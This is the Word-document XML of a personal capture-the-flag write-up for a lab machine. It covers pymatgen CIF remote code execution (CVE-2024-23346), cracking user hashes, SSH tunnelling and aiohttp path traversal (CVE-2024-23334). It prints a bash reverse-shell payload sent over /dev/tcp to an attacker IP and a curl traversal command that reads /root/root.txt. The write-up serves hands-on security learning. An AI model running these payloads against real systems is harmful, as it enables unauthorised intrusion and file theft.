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B36A9" w14:textId="4EBBA71F" w:rsidR="005640E6" w:rsidRDefault="008B1AAE">
      <w:r w:rsidRPr="008B1AAE">
        <w:t>Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1AAE">
        <w:t>pymatgen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1AAE">
        <w:t>` (CVE-2024-23346) Python library by uploading a malicious `CIF` file to the hosted `CIF Analyzer` website on the target. After discovering and cracking hashes, we authenticate to the target via SSH as `rosa` user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in a Python library called `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1AAE">
        <w:t>AioHTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1AAE">
        <w:t>` (CVE-2024-23334) which is used on the web application running internally to read the root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907D1F9" w14:textId="109FB09B" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE">
      <w:r>
        <w:t>1.Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC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10.10.11.38 reveals 2 open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FE9DC" w14:textId="76D0C034" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="416A83C0" wp14:editId="2E2AD15C">
            <wp:extent cx="5943600" cy="2379345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2063101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0123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3341" w14:textId="17CB8597" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D0BC1B" wp14:editId="0A971B3E">
            <wp:extent cx="5943600" cy="2431415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="170934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9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D9BB" w14:textId="77777777" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE"/>
    <w:p w14:paraId="67524729" w14:textId="030BF5F7" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE" w:rsidP="008B1AAE">
      <w:r>
        <w:t xml:space="preserve">We can register an account and access the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app.It</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> looks like the app let’s you upload files in order to analyze samples.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Upon searching the web for CIF Analyzer Vulnerabilities we find this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1AAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004637DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/9carlo6/CVE-2024-23346</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2357D2B0" w14:textId="77777777" w:rsidR="008B1AAE" w:rsidRDefault="008B1AAE" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="49292542" w14:textId="141EBB99" w:rsidR="008B1AAE" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:t xml:space="preserve">After I modified the exploit.py </w:t>
      </w:r>
      <w:r w:rsidRPr="005747A7">
        <w:t>("/bin/bash -c '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005747A7">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005747A7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005747A7">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005747A7">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005747A7">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005747A7">
        <w:t>/10.10.10.10/4444 0&gt;&amp;1'"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to match my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip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started a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on port 4444 and uploaded the file we’re greeted with an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C983E72" w14:textId="215117BE" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F089955" wp14:editId="148DC861">
            <wp:extent cx="5943600" cy="2130425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1797976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60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F020" w14:textId="7F78CC82" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584A952E" wp14:editId="04895A28">
            <wp:extent cx="5943600" cy="1677670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12851412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4127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004" w14:textId="77777777" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="7DE460B4" w14:textId="56331C28" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:t>So upon further investigation I figured I can download an example file from /static/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>example.cif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and edit it with our exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB03592" w14:textId="1AE17530" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5659665D" wp14:editId="0A6A9D07">
            <wp:extent cx="5943600" cy="2053590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="29100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110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AF61" w14:textId="4FE19126" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>It worked, I pressed view and I got a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255507A" w14:textId="28024929" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABD7AF7" wp14:editId="2A2EAB0E">
            <wp:extent cx="5943600" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1792997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972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CB40" w14:textId="77777777" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="7AE2016C" w14:textId="4F0C1A4E" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5A0A57" wp14:editId="03CCB63E">
            <wp:extent cx="5943600" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1964661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115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D51" w14:textId="664FC169" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="005747A7">
      <w:r>
        <w:t xml:space="preserve">It looks like we’re in as the user “app” and can’t access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rosa’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flag but we can access the app directory we find a database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with stored users and password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA804D" w14:textId="073E0C4D" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="726A93E7" wp14:editId="34520E9D">
            <wp:extent cx="6487795" cy="2949934"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="1651389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92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7575" cy="29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06A4" w14:textId="77777777" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="00953932"/>
    <w:p w14:paraId="341EBDAA" w14:textId="77777777" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="00953932"/>
    <w:p w14:paraId="5E794370" w14:textId="5EA67D38" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="00953932">
      <w:r>
        <w:t xml:space="preserve">After trying them all on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I’ve managed to crack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rosa’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D0C8E" w14:textId="77777777" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="00953932">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E77A0DF" wp14:editId="1E63331A">
            <wp:extent cx="5943600" cy="687070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185747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79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8254" w14:textId="1AA21BE7" w:rsidR="005747A7" w:rsidRDefault="005747A7" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="7734AEE2" w14:textId="098CCCDF" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ssh’ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inside and we grab the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B45793" w14:textId="1370660A" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A073E1C" wp14:editId="62E6A604">
            <wp:extent cx="3076575" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="207674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1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909" w14:textId="77777777" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="4C6217FB" w14:textId="39C962F7" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:r>
        <w:t xml:space="preserve">We can’t run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and we can’t access anything so I tried to see if anything listening on the machine ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982845B" w14:textId="5BE39D57" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4617F938" wp14:editId="789E9842">
            <wp:extent cx="5943600" cy="909320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="15857938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93887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E31" w14:textId="77777777" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="68684C93" w14:textId="2281090F" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>It looks like another webapp running “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aiohttp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/3.9.1” which has : </w:t>
      </w:r>
      <w:r w:rsidRPr="00953932">
        <w:t>CVE-2024-23334</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D916D32" w14:textId="0487CA4B" w:rsidR="00953932" w:rsidRDefault="00953932" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE11B56" wp14:editId="67BACE43">
            <wp:extent cx="5210175" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="18507299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993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5925" w14:textId="279A0D26" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE">
      <w:r>
        <w:t>I couldn’t figure out how to access it so I’ve used the hints which stated to ssh tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520217F" w14:textId="5F808CAF" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A1F9E7" wp14:editId="70949F38">
            <wp:extent cx="5943600" cy="3898265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="776715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156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1C8" w14:textId="6A2366FE" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE">
      <w:r>
        <w:t xml:space="preserve">After tunneling we could access the localhost which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>revelead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> another website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D78EFF" w14:textId="19E0880F" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D06590" wp14:editId="35B00F53">
            <wp:extent cx="5943600" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1802632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3200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2A4" w14:textId="77777777" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="7EE73C1D" w14:textId="72493A36" w:rsidR="00D6218E" w:rsidRDefault="00D6218E" w:rsidP="008B1AAE">
      <w:r>
        <w:t xml:space="preserve">I didn’t fiddle with it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> much because I wanted to try the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="005F520A">
        <w:t xml:space="preserve"> but I couldn’t get it to work so I tried a couple of curls since I can curl the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F520A">
        <w:t>locahost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F520A">
        <w:t xml:space="preserve"> and get a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F5150" w14:textId="7CC70B0F" w:rsidR="005F520A" w:rsidRDefault="005F520A" w:rsidP="008B1AAE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Eventually I gave up and searched for a solution</w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:t xml:space="preserve">I’ve found a </w:t>
      </w:r>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:t xml:space="preserve"> command which worked “curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -–path-as-is </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="004637DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1/assets/../../../../../root/root.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to get the flag </w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C" w:rsidRPr="005D2A5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2A5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AE621A" wp14:editId="34441EE6">
            <wp:extent cx="3619500" cy="6153150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135417894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8944" name="Picture 1" descr="A computer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AE78" w14:textId="1D90F861" w:rsidR="005F520A" w:rsidRDefault="005F520A" w:rsidP="008B1AAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D955370" wp14:editId="047B236C">
            <wp:extent cx="3619500" cy="6153150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1915007660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07660" name="Picture 1" descr="A computer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CBD4" w14:textId="77777777" w:rsidR="005F520A" w:rsidRDefault="005F520A" w:rsidP="008B1AAE"/>
    <w:p w14:paraId="4EEF527E" w14:textId="77777777" w:rsidR="005F520A" w:rsidRDefault="005F520A" w:rsidP="008B1AAE"/>
    <w:sectPr w:rsidR="005F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0E6"/>
    <w:rsid w:val="005640E6"/>
    <w:rsid w:val="005747A7"/>
    <w:rsid w:val="005D2A5C"/>
    <w:rsid w:val="005F520A"/>
    <w:rsid w:val="008B1AAE"/>
    <w:rsid w:val="00953932"/>
    <w:rsid w:val="00D6218E"/>
    <w:rsid w:val="00F5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7216A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D2B56674-10B5-4029-B4D6-18ED70609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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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1A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A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9carlo6/CVE-2024-23346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127.0.0.1/assets/../../../../../root/root.tx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cozea petre</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cozea petre</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-26T14:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-26T15:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>